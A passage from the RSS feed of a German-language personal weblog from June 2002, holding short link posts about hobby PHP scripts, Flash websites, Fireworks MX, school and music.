  16730.    <description><![CDATA[Mit ein paar PHP-Scripts ist habe ich hier einen <b>XML</b> basierten <b>Referer-</b> und <b>User-Agent-Log</b> gebastelt.<br><b><a href="https://blog.x-way.org/stuff/XML-Log.zip">Hier</a></b> kann man ihn herunterladen.
  16731. ]]></description>
  16732.    <content:encoded><![CDATA[Mit ein paar PHP-Scripts ist habe ich hier einen <b>XML</b> basierten <b>Referer-</b> und <b>User-Agent-Log</b> gebastelt.<br><b><a href="https://blog.x-way.org/stuff/XML-Log.zip">Hier</a></b> kann man ihn herunterladen.
  16733. ]]></content:encoded>
  16734.  </item>
  16735.  
  16736.  <item>
  16737.    <title>"Lies es jetzt, kauf es nie"</title>
  16738.    <link>https://blog.x-way.org/Misc/2002/06/18/Lies_es_jetzt_kauf_es_nie.html</link>
  16739.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=22</guid>
  16740.    <dc:creator>Andreas Jaggi</dc:creator>
  16741.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16742.    <pubDate>Tue, 18 Jun 2002 23:09:00 +0000</pubDate>
  16743.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16744.    <description><![CDATA[Habe heute Morgen nicht schlecht gestaunt, als ich in der Gratis-Zeitung <a href="http://www.20min.ch/" target="_blank"><b>20 Minuten</b></a> einen halbseitigen Artikel über die "Anti-Suhrkamp-Kampagne" unter der Rubrik Webpage gefunden habe. Nachdem das Thema in sämtlichen Weblogs und Tageszeitungen zur Genüge diskutiert wurde, wird es jetzt auch noch als <b>"Platzfüller"</b> in Gratiszeitungen verwendet.<br><a href="http://www.schockwellenreiter.de/2002/06/18.html#a6135" target="_blank"><b>Hier</b></a> findet man den Link zur <a href="https://web.archive.org/web/20020708133050/https://www.20min.ch/service/pc_und_internet/story/2982975" target="_blank">Online-Version</a> des Artikels.<br>Dadurch wird <a href="http://www.schockwellenreiter.de/" target="_blank">www.schockwellenreiter.de</a> noch einmal mehr Visits bekommen, soll's wohlbekommen. ;-)
  16745. ]]></description>
  16746.    <content:encoded><![CDATA[Habe heute Morgen nicht schlecht gestaunt, als ich in der Gratis-Zeitung <a href="http://www.20min.ch/" target="_blank"><b>20 Minuten</b></a> einen halbseitigen Artikel über die "Anti-Suhrkamp-Kampagne" unter der Rubrik Webpage gefunden habe. Nachdem das Thema in sämtlichen Weblogs und Tageszeitungen zur Genüge diskutiert wurde, wird es jetzt auch noch als <b>"Platzfüller"</b> in Gratiszeitungen verwendet.<br><a href="http://www.schockwellenreiter.de/2002/06/18.html#a6135" target="_blank"><b>Hier</b></a> findet man den Link zur <a href="https://web.archive.org/web/20020708133050/https://www.20min.ch/service/pc_und_internet/story/2982975" target="_blank">Online-Version</a> des Artikels.<br>Dadurch wird <a href="http://www.schockwellenreiter.de/" target="_blank">www.schockwellenreiter.de</a> noch einmal mehr Visits bekommen, soll's wohlbekommen. ;-)
  16747. ]]></content:encoded>
  16748.  </item>
  16749.  
  16750.  <item>
  16751.    <title>RSS + Fun</title>
  16752.    <link>https://blog.x-way.org/Misc/2002/06/17/RSS__Fun.html</link>
  16753.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=21</guid>
  16754.    <dc:creator>Andreas Jaggi</dc:creator>
  16755.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16756.    <pubDate>Mon, 17 Jun 2002 00:12:00 +0000</pubDate>
  16757.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16758.    <description><![CDATA[Nach längerer und durchaus unterhaltsamer Bastelei liegt nun <a href="https://blog.x-way.org/rss.xml"><b>hier</b></a> ein RSS-Feed des x-log.<br>Ein unterhaltsamer und *lehrreicher* Flash-Film befindet sich <a href="#" target="_blank" class="gone"><b>hier</b></a>.<br>Via ICQ von Ramon
  16759. ]]></description>
  16760.    <content:encoded><![CDATA[Nach längerer und durchaus unterhaltsamer Bastelei liegt nun <a href="https://blog.x-way.org/rss.xml"><b>hier</b></a> ein RSS-Feed des x-log.<br>Ein unterhaltsamer und *lehrreicher* Flash-Film befindet sich <a href="#" target="_blank" class="gone"><b>hier</b></a>.<br>Via ICQ von Ramon
  16761. ]]></content:encoded>
  16762.  </item>
  16763.  
  16764.  <item>
  16765.    <title>Sicherheit geht vor!</title>
  16766.    <link>https://blog.x-way.org/Coding/2002/06/16/Sicherheit_geht_vor.html</link>
  16767.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=20</guid>
  16768.    <dc:creator>Andreas Jaggi</dc:creator>
  16769.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16770.    <pubDate>Sun, 16 Jun 2002 03:43:00 +0000</pubDate>
  16771.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  16772.    <description><![CDATA[Aus reiner Lust an zufälligen Passwörtern habe ich ein kleines <a href="https://blog.x-way.org/stuff/passwortgenerator.php" target="_blank"><b>PHP-Script</b></a> geschrieben. Damit habe ich <a href="https://web.archive.org/web/20020404121249/http://www.cnlab.ch/pwcheck/" target="_blank"><b>hier</b></a> sogar ein 8-Zeichen Passwort hingebracht, für das man <b>307</b> Jahre zum entschlüsseln braucht. ;-)<br>Hier noch der <a href="https://blog.x-way.org/stuff/passwortgenerator.txt" target="_blank">Code</a>.
  16773. ]]></description>
  16774.    <content:encoded><![CDATA[Aus reiner Lust an zufälligen Passwörtern habe ich ein kleines <a href="https://blog.x-way.org/stuff/passwortgenerator.php" target="_blank"><b>PHP-Script</b></a> geschrieben. Damit habe ich <a href="https://web.archive.org/web/20020404121249/http://www.cnlab.ch/pwcheck/" target="_blank"><b>hier</b></a> sogar ein 8-Zeichen Passwort hingebracht, für das man <b>307</b> Jahre zum entschlüsseln braucht. ;-)<br>Hier noch der <a href="https://blog.x-way.org/stuff/passwortgenerator.txt" target="_blank">Code</a>.
  16775. ]]></content:encoded>
  16776.  </item>
  16777.  
  16778.  <item>
  16779.    <title>Registry-Spielerei</title>
  16780.    <link>https://blog.x-way.org/Tech/2002/06/16/Registry-Spielerei.html</link>
  16781.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=19</guid>
  16782.    <dc:creator>Andreas Jaggi</dc:creator>
  16783.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16784.    <pubDate>Sun, 16 Jun 2002 02:22:00 +0000</pubDate>
  16785.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  16786.    <description><![CDATA[<a href="https://web.archive.org/web/20020718140131/http://www.winguides.com/" target="_blank">Hier</a> habe ich einen <a href="https://web.archive.org/web/20020607003205/http://www.winguides.com/registry/display.php/799/" target="_blank"><b>Artikel</b></a> gefunden, der erklärt, wie man den <a href="https://web.archive.org/web/20020607003205/http://www.winguides.com/registry/display.php/799/" target="_blank">User Agent String des Internet Explorers ändern kann</a>.
  16787. ]]></description>
  16788.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20020718140131/http://www.winguides.com/" target="_blank">Hier</a> habe ich einen <a href="https://web.archive.org/web/20020607003205/http://www.winguides.com/registry/display.php/799/" target="_blank"><b>Artikel</b></a> gefunden, der erklärt, wie man den <a href="https://web.archive.org/web/20020607003205/http://www.winguides.com/registry/display.php/799/" target="_blank">User Agent String des Internet Explorers ändern kann</a>.
  16789. ]]></content:encoded>
  16790.  </item>
  16791.  
  16792.  <item>
  16793.    <title>XML-Gebastel</title>
  16794.    <link>https://blog.x-way.org/Coding/2002/06/15/XML-Gebastel.html</link>
  16795.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=18</guid>
  16796.    <dc:creator>Andreas Jaggi</dc:creator>
  16797.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16798.    <pubDate>Sat, 15 Jun 2002 03:22:00 +0000</pubDate>
  16799.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  16800.    <description><![CDATA[Da ich mich gerade etwas in XML einarbeite, habe ich nun einen <b>XML-basierten PHP-Refererlog</b> geschrieben.<br><a href="http://waterwave.ch/weblog/lastrefs.php" target="_self"><b>Hier</b></a> die HTML-Ausgabe, und <a href="http://waterwave.ch/weblog/lastrefs.php?xml=1" target="_self"><b>hier</b></a> die XML-Base.
  16801. ]]></description>
  16802.    <content:encoded><![CDATA[Da ich mich gerade etwas in XML einarbeite, habe ich nun einen <b>XML-basierten PHP-Refererlog</b> geschrieben.<br><a href="http://waterwave.ch/weblog/lastrefs.php" target="_self"><b>Hier</b></a> die HTML-Ausgabe, und <a href="http://waterwave.ch/weblog/lastrefs.php?xml=1" target="_self"><b>hier</b></a> die XML-Base.
  16803. ]]></content:encoded>
  16804.  </item>
  16805.  
  16806.  <item>
  16807.    <title>Flash-Site</title>
  16808.    <link>https://blog.x-way.org/Webdesign/2002/06/13/Flash-Site.html</link>
  16809.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=17</guid>
  16810.    <dc:creator>Andreas Jaggi</dc:creator>
  16811.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16812.    <pubDate>Thu, 13 Jun 2002 19:12:00 +0000</pubDate>
  16813.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  16814.    <description><![CDATA[Den <a href="https://web.archive.org/web/20020721150203/http://www.superlooper.de/" target="_blank"><b>Link</b></a> zu einer Website, die farblich völlig meinem Geschmack entspricht, habe ich <a href="https://kniebes.com/2002/06/13/5629" target="_blank"><b>hier</b></a> gefunden.
  16815. ]]></description>
  16816.    <content:encoded><![CDATA[Den <a href="https://web.archive.org/web/20020721150203/http://www.superlooper.de/" target="_blank"><b>Link</b></a> zu einer Website, die farblich völlig meinem Geschmack entspricht, habe ich <a href="https://kniebes.com/2002/06/13/5629" target="_blank"><b>hier</b></a> gefunden.
  16817. ]]></content:encoded>
  16818.  </item>
  16819.  
  16820.  <item>
  16821.    <title>Southpark</title>
  16822.    <link>https://blog.x-way.org/Misc/2002/06/12/Southpark.html</link>
  16823.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=16</guid>
  16824.    <dc:creator>Andreas Jaggi</dc:creator>
  16825.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16826.    <pubDate>Wed, 12 Jun 2002 19:15:00 +0000</pubDate>
  16827.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16828.    <description><![CDATA[Noch so ein idealisiertes Selbstbildnis.<br>(Das andere findet man <a href="http://waterwave.ch/weblog/about.php" target="_self">hier</a>)<br><br><img src="https://blog.x-way.org/images/southpark.gif" alt="Southpark Portrait" width="215" height="292"><br><br>Hergestellt <a href="https://web.archive.org/web/20020604021533/http://southpark.gamesweb.com/flash/sp-studio.html" target="_blank"><b>hier</b></a>, gefunden via <a href="https://web.archive.org/web/20020531190414/http://www.blackshirt.de/" target="_blank"><b>Tim</b></a> und <a href="https://web.archive.org/web/20020604053606/http://www.pixelsinddoof.de/log/" target="_blank"><b>Frederike</b></a>.
  16829. ]]></description>
  16830.    <content:encoded><![CDATA[Noch so ein idealisiertes Selbstbildnis.<br>(Das andere findet man <a href="http://waterwave.ch/weblog/about.php" target="_self">hier</a>)<br><br><img src="https://blog.x-way.org/images/southpark.gif" alt="Southpark Portrait" width="215" height="292"><br><br>Hergestellt <a href="https://web.archive.org/web/20020604021533/http://southpark.gamesweb.com/flash/sp-studio.html" target="_blank"><b>hier</b></a>, gefunden via <a href="https://web.archive.org/web/20020531190414/http://www.blackshirt.de/" target="_blank"><b>Tim</b></a> und <a href="https://web.archive.org/web/20020604053606/http://www.pixelsinddoof.de/log/" target="_blank"><b>Frederike</b></a>.
  16831. ]]></content:encoded>
  16832.  </item>
  16833.  
  16834.  <item>
  16835.    <title>Fireworks MX ist da!</title>
  16836.    <link>https://blog.x-way.org/Webdesign/2002/06/12/Fireworks_MX_ist_da.html</link>
  16837.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=15</guid>
  16838.    <dc:creator>Andreas Jaggi</dc:creator>
  16839.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16840.    <pubDate>Wed, 12 Jun 2002 02:00:00 +0000</pubDate>
  16841.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  16842.    <description><![CDATA[Die neue Version meines Graphikprogrammes erscheint und ich habs total verschlafen (liegt vermutlich am Stress der
  16843.  
  16844. Maturaarbeit).<br><br><a href="https://en.wikipedia.org/wiki/Macromedia" target="_blank"><b>Macromedia</b></a> hat nun die MX
  16845.  
  16846. Produktversionen fertiggestellt. Hab gerade die Fireworks MX Trial-Version gesaugt. Die Auswirkungen werdet ihr sicher in
  16847.  
  16848. nächster Zeit sehen ;-)<br>BTW: Laut Macromedia hat <b>MX</b> keine spezielle Bedeutung; schaut man aber auf die um bis zu
  16849.  
  16850. 100$ gestiegenen Preise, so erscheint <b>More eXpensive</b> doch ziemlich realistisch ;-)
  16851. ]]></description>
  16852.    <content:encoded><![CDATA[Die neue Version meines Graphikprogrammes erscheint und ich habs total verschlafen (liegt vermutlich am Stress der
  16853.  
  16854. Maturaarbeit).<br><br><a href="https://en.wikipedia.org/wiki/Macromedia" target="_blank"><b>Macromedia</b></a> hat nun die MX
  16855.  
  16856. Produktversionen fertiggestellt. Hab gerade die Fireworks MX Trial-Version gesaugt. Die Auswirkungen werdet ihr sicher in
  16857.  
  16858. nächster Zeit sehen ;-)<br>BTW: Laut Macromedia hat <b>MX</b> keine spezielle Bedeutung; schaut man aber auf die um bis zu
  16859.  
  16860. 100$ gestiegenen Preise, so erscheint <b>More eXpensive</b> doch ziemlich realistisch ;-)
  16861. ]]></content:encoded>
  16862.  </item>
  16863.  
  16864.  <item>
  16865.    <title>blo.gs-Ping</title>
  16866.    <link>https://blog.x-way.org/Coding/2002/06/12/blogs-Ping.html</link>
  16867.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=14</guid>
  16868.    <dc:creator>Andreas Jaggi</dc:creator>
  16869.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16870.    <pubDate>Wed, 12 Jun 2002 00:49:00 +0000</pubDate>
  16871.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  16872.    <description><![CDATA[Bei <a href="http://www.blo.gs/" target="_blank">blo.gs</a> findet wann wie bei <a href="https://web.archive.org/web/20020526111552/http://www.weblogs.com:80/" target="_blank">weblogs.com</a> immer die aktuellsten Weblogs.<br>Um die Eintragung des eigenen Weblogs zu vereinfachen, hat <a href="http://www.pepilog.de/" target="_blank"><b>Pepino</b></a> ein kleines <a href="http://www.pepilog.de/downloads/allgemein.htm" target="_blank"><b>PHP-Script</b></a> geschrieben.
  16873. ]]></description>
  16874.    <content:encoded><![CDATA[Bei <a href="http://www.blo.gs/" target="_blank">blo.gs</a> findet wann wie bei <a href="https://web.archive.org/web/20020526111552/http://www.weblogs.com:80/" target="_blank">weblogs.com</a> immer die aktuellsten Weblogs.<br>Um die Eintragung des eigenen Weblogs zu vereinfachen, hat <a href="http://www.pepilog.de/" target="_blank"><b>Pepino</b></a> ein kleines <a href="http://www.pepilog.de/downloads/allgemein.htm" target="_blank"><b>PHP-Script</b></a> geschrieben.
  16875. ]]></content:encoded>
  16876.  </item>
  16877.  
  16878.  <item>
  16879.    <title>Blogger Code</title>
  16880.    <link>https://blog.x-way.org/Misc/2002/06/11/Blogger_Code.html</link>
  16881.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=13</guid>
  16882.    <dc:creator>Andreas Jaggi</dc:creator>
  16883.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16884.    <pubDate>Tue, 11 Jun 2002 17:20:00 +0000</pubDate>
  16885.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16886.    <description><![CDATA[Entdeckt und unverzüglich ausgefüllt: <a href="https://web.archive.org/web/20020604035148/http://www.leatheregg.com/bloggercode/" target="_blank"><b>Blogger Code</b></a><br>Und das hier ist rausgekommen:<br><a href="#" class="gone" target="_blank">B1 d t++ k s++ u-- f i o x e l c</a>
  16887. ]]></description>
  16888.    <content:encoded><![CDATA[Entdeckt und unverzüglich ausgefüllt: <a href="https://web.archive.org/web/20020604035148/http://www.leatheregg.com/bloggercode/" target="_blank"><b>Blogger Code</b></a><br>Und das hier ist rausgekommen:<br><a href="#" class="gone" target="_blank">B1 d t++ k s++ u-- f i o x e l c</a>
  16889. ]]></content:encoded>
  16890.  </item>
  16891.  
  16892.  <item>
  16893.    <title>CS im RL</title>
  16894.    <link>https://blog.x-way.org/Misc/2002/06/09/CS_im_RL.html</link>
  16895.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=12</guid>
  16896.    <dc:creator>Andreas Jaggi</dc:creator>
  16897.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16898.    <pubDate>Sun, 09 Jun 2002 02:53:00 +0000</pubDate>
  16899.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16900.    <description><![CDATA[Jemandem der schon einmal <a href="https://de.wikipedia.org/wiki/Counter-Strike_(Computerspiel)" target="_blank">CS</a> gespielt hat, darf man <a href="https://web.archive.org/web/20020808141214/http://www.towandas-turbulenzen.de/cs.htm" target="_blank"><b>das hier</b></a> auf keinen Fall vorenthalten!
  16901. ]]></description>
  16902.    <content:encoded><![CDATA[Jemandem der schon einmal <a href="https://de.wikipedia.org/wiki/Counter-Strike_(Computerspiel)" target="_blank">CS</a> gespielt hat, darf man <a href="https://web.archive.org/web/20020808141214/http://www.towandas-turbulenzen.de/cs.htm" target="_blank"><b>das hier</b></a> auf keinen Fall vorenthalten!
  16903. ]]></content:encoded>
  16904.  </item>
  16905.  
  16906.  <item>
  16907.    <title>Paris</title>
  16908.    <link>https://blog.x-way.org/Misc/2002/06/09/Paris.html</link>
  16909.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=11</guid>
  16910.    <dc:creator>Andreas Jaggi</dc:creator>
  16911.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16912.    <pubDate>Sun, 09 Jun 2002 00:42:00 +0000</pubDate>
  16913.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16914.    <description><![CDATA[Wieder einmal eine Website über meine <a href="https://web.archive.org/web/20020531040049/http://www.pariscope.fr/" target="_blank"><b>Lieblingsstadt</b></a> gefunden.<br>
  16915. ]]></description>
  16916.    <content:encoded><![CDATA[Wieder einmal eine Website über meine <a href="https://web.archive.org/web/20020531040049/http://www.pariscope.fr/" target="_blank"><b>Lieblingsstadt</b></a> gefunden.<br>
  16917. ]]></content:encoded>
  16918.  </item>
  16919.  
  16920.  <item>
  16921.    <title>f&#x26;ffff</title>
  16922.    <link>https://blog.x-way.org/Misc/2002/06/08/fffff.html</link>
  16923.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=10</guid>
  16924.    <dc:creator>Andreas Jaggi</dc:creator>
  16925.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16926.    <pubDate>Sat, 08 Jun 2002 18:02:00 +0000</pubDate>
  16927.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16928.    <description><![CDATA[<i>1. Was war dein letzter penetrantester Ohrwurm ? Wie wurde er ausgelöst ?</i><br>
  16929. Momentan ist es <b>An Apple A Day</b> von <b>Le Hammond Inferno</b>. Entdeckt beim Webradio-hören (<a href="https://web.archive.org/web/20020802102556/http://www.radiofreevirgin.com/" target="_blank">Radio Free Virgin</a>, Channel Magestore Paris).<br>
  16930. <i>2. Welche Musik-CD hast du dir zuletzt gekauft ? Was verbindest du mit der CD ?</i><br>
  16931. Das war <b>des Visages des Figures</b> von <b><a href="http://www.noirdez.com/">Noir Désir</a></b>. Damit verbinde ich vor allem die Erinnerung an eine wunderbare Woche in Paris.<br>
  16932. <i>3. Bei welchem Song würdest du dein Radiowecker am Liebsten an die Wand klatschen ?</i><br>
  16933. Bei vielen Songs; u.a. bei T.E.A.R.S, No Angels, Wonderwall ...<br>
  16934. <i>4. Bei welcher Musikgruppe/Musikrichtung gehst du total auf ?</i><br>
  16935. <b><a href="http://www.noirdez.com/">Noir Désir</a></b><br>
  16936. <i>5. Zippel-Zappel- oder Rumpel-Pumpel-Musik ?</i><br>
  16937. Eher Rumpel-Pumpel, aber ab und zu auch mal Zippel-Zappel<br><br><a href="https://web.archive.org/web/20020629034159/http://www.mywebwork.de/fiene.tv/akte_blog-275.php3#comm" target="_blank">fiene &amp; fünf fragen für freitag</a>
  16938. ]]></description>
  16939.    <content:encoded><![CDATA[<i>1. Was war dein letzter penetrantester Ohrwurm ? Wie wurde er ausgelöst ?</i><br>
  16940. Momentan ist es <b>An Apple A Day</b> von <b>Le Hammond Inferno</b>. Entdeckt beim Webradio-hören (<a href="https://web.archive.org/web/20020802102556/http://www.radiofreevirgin.com/" target="_blank">Radio Free Virgin</a>, Channel Magestore Paris).<br>
  16941. <i>2. Welche Musik-CD hast du dir zuletzt gekauft ? Was verbindest du mit der CD ?</i><br>
  16942. Das war <b>des Visages des Figures</b> von <b><a href="http://www.noirdez.com/">Noir Désir</a></b>. Damit verbinde ich vor allem die Erinnerung an eine wunderbare Woche in Paris.<br>
  16943. <i>3. Bei welchem Song würdest du dein Radiowecker am Liebsten an die Wand klatschen ?</i><br>
  16944. Bei vielen Songs; u.a. bei T.E.A.R.S, No Angels, Wonderwall ...<br>
  16945. <i>4. Bei welcher Musikgruppe/Musikrichtung gehst du total auf ?</i><br>
  16946. <b><a href="http://www.noirdez.com/">Noir Désir</a></b><br>
  16947. <i>5. Zippel-Zappel- oder Rumpel-Pumpel-Musik ?</i><br>
  16948. Eher Rumpel-Pumpel, aber ab und zu auch mal Zippel-Zappel<br><br><a href="https://web.archive.org/web/20020629034159/http://www.mywebwork.de/fiene.tv/akte_blog-275.php3#comm" target="_blank">fiene &amp; fünf fragen für freitag</a>
  16949. ]]></content:encoded>
  16950.  </item>
  16951.  
  16952.  <item>
  16953.    <title>Flash</title>
  16954.    <link>https://blog.x-way.org/Webdesign/2002/06/08/Flash.html</link>
  16955.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=9</guid>
  16956.    <dc:creator>Andreas Jaggi</dc:creator>
  16957.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16958.    <pubDate>Sat, 08 Jun 2002 17:26:00 +0000</pubDate>
  16959.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  16960.    <description><![CDATA[Etwas <a href="https://web.archive.org/web/20020802232734/http://www.humbugz.com/hela.htm" target="_blank"><b>wunderschönes ...</b></a>
  16961. ]]></description>
  16962.    <content:encoded><![CDATA[Etwas <a href="https://web.archive.org/web/20020802232734/http://www.humbugz.com/hela.htm" target="_blank"><b>wunderschönes ...</b></a>
  16963. ]]></content:encoded>
  16964.  </item>
  16965.  
  16966.  <item>
  16967.    <title>Schule</title>
  16968.    <link>https://blog.x-way.org/Misc/2002/06/08/Schule.html</link>
  16969.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=8</guid>
  16970.    <dc:creator>Andreas Jaggi</dc:creator>
  16971.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16972.    <pubDate>Sat, 08 Jun 2002 16:05:00 +0000</pubDate>
  16973.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  16974.    <description><![CDATA[Letzte Woche war so richtig stressig. <b>Zwei</b> Referate und <b>drei</b> Proben. Durchschnittlich <b>drei</b> Stunden Schlaf! Nicht sonderbar verwunderlich, dass ich heute bis 13.30 Uhr geschlafen habe.<br>Hier noch zwei Erzeugnisse meiner Schlaflosigkeit:<br><br><b><a href="https://blog.x-way.org/stuff/maxfrisch.txt" target="_blank">Max Frisch - Santa Cruz</a></b><br><b><a href="https://blog.x-way.org/stuff/friedrichduerrenmatt.txt" target="_blank">Friedrich Dürrenmatt</a></b><br>
  16975. ]]></description>
  16976.    <content:encoded><![CDATA[Letzte Woche war so richtig stressig. <b>Zwei</b> Referate und <b>drei</b> Proben. Durchschnittlich <b>drei</b> Stunden Schlaf! Nicht sonderbar verwunderlich, dass ich heute bis 13.30 Uhr geschlafen habe.<br>Hier noch zwei Erzeugnisse meiner Schlaflosigkeit:<br><br><b><a href="https://blog.x-way.org/stuff/maxfrisch.txt" target="_blank">Max Frisch - Santa Cruz</a></b><br><b><a href="https://blog.x-way.org/stuff/friedrichduerrenmatt.txt" target="_blank">Friedrich Dürrenmatt</a></b><br>
  16977. ]]></content:encoded>
  16978.  </item>
  16979.  
  16980.  <item>
  16981.    <title>Flash-Sites</title>
  16982.    <link>https://blog.x-way.org/Webdesign/2002/06/06/Flash-Sites1.html</link>
  16983.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=7</guid>
  16984.    <dc:creator>Andreas Jaggi</dc:creator>
  16985.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  16986.    <pubDate>Thu, 06 Jun 2002 23:34:00 +0000</pubDate>
  16987.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  16988.    <description><![CDATA[Gerade so ins Auge gestochen sind mir:<br><br>
  16989. Verrücktes Design, aber trotzdem ansprechend: <a href="https://web.archive.org/web/20020726013257/http://www.jureta.com/" target="_blank"><b>http://www.jureta.com/</b></a><br>
  16990. Minimalistisches Layout: <a href="https://web.archive.org/web/20020722112138/http://www.soerianto.net/" target="_blank"><b>http://www.soerianto.net/</b></a><br>
  16991. Gewöhnungsbedürftig: <a href="https://web.archive.org/web/20030110115541/http://flakk.pixelwar.at/" target="_blank"><b>http://flakk.pixelwar.at/</b></a><br>
  16992. Technisch hochstehend: <a href="https://web.archive.org/web/20020604193551/http://www.acme24.de/" target="_blank"><b>http://www.acme24.de/</b></a>
  16993. ]]></description>
  16994.    <content:encoded><![CDATA[Gerade so ins Auge gestochen sind mir:<br><br>
  16995. Verrücktes Design, aber trotzdem ansprechend: <a href="https://web.archive.org/web/20020726013257/http://www.jureta.com/" target="_blank"><b>http://www.jureta.com/</b></a><br>
  16996. Minimalistisches Layout: <a href="https://web.archive.org/web/20020722112138/http://www.soerianto.net/" target="_blank"><b>http://www.soerianto.net/</b></a><br>
  16997. Gewöhnungsbedürftig: <a href="https://web.archive.org/web/20030110115541/http://flakk.pixelwar.at/" target="_blank"><b>http://flakk.pixelwar.at/</b></a><br>
  16998. Technisch hochstehend: <a href="https://web.archive.org/web/20020604193551/http://www.acme24.de/" target="_blank"><b>http://www.acme24.de/</b></a>
  16999. ]]></content:encoded>
  17000.  </item>
  17001.  
  17002.  <item>
  17003.    <title>Farbenlehre</title>
  17004.    <link>https://blog.x-way.org/Webdesign/2002/06/06/Farbenlehre.html</link>
  17005.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=6</guid>
  17006.    <dc:creator>Andreas Jaggi</dc:creator>
  17007.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  17008.    <pubDate>Thu, 06 Jun 2002 22:08:00 +0000</pubDate>
  17009.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  17010.    <description><![CDATA[Auf <a href="https://web.archive.org/web/20051028074738/http://metacolor.de/" target="_blank"><b>metacolor.de</b></a> hat es ein IMHO sehr gutes Tutorial zum Thema <b>Farben im Internet</b>. Besonders geeignet für Leute, die, wie ich, im Umgang mit Farben nicht besonders geschickt sind. ;-)
  17011. ]]></description>
  17012.    <content:encoded><![CDATA[Auf <a href="https://web.archive.org/web/20051028074738/http://metacolor.de/" target="_blank"><b>metacolor.de</b></a> hat es ein IMHO sehr gutes Tutorial zum Thema <b>Farben im Internet</b>. Besonders geeignet für Leute, die, wie ich, im Umgang mit Farben nicht besonders geschickt sind. ;-)
  17013. ]]></content:encoded>
  17014.  </item>
  17015.  
  17016.  <item>
  17017.    <title>Gelungene Kombination</title>
  17018.    <link>https://blog.x-way.org/Misc/2002/06/04/Gelungene_Kombination.html</link>
  17019.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=5</guid>
  17020.    <dc:creator>Andreas Jaggi</dc:creator>
  17021.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  17022.    <pubDate>Tue, 04 Jun 2002 22:46:00 +0000</pubDate>
  17023.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  17024.    <description><![CDATA[Die Website von <a href="https://web.archive.org/web/20020718184032/http://www.mediapride.de/" target="_blank"><b>Mediapride</b></a> setzt Flash sehr geschickt ein. Man beachte die elegante Navigationsleiste.
  17025. ]]></description>
  17026.    <content:encoded><![CDATA[Die Website von <a href="https://web.archive.org/web/20020718184032/http://www.mediapride.de/" target="_blank"><b>Mediapride</b></a> setzt Flash sehr geschickt ein. Man beachte die elegante Navigationsleiste.
  17027. ]]></content:encoded>
  17028.  </item>
  17029.  
  17030.  <item>
  17031.    <title>Referat über Max Frisch - Santa Cruz</title>
  17032.    <link>https://blog.x-way.org/Misc/2002/06/04/Referat_ueber_Max_Frisch_-_Santa_Cruz.html</link>
  17033.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=4</guid>
  17034.    <dc:creator>Andreas Jaggi</dc:creator>
  17035.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
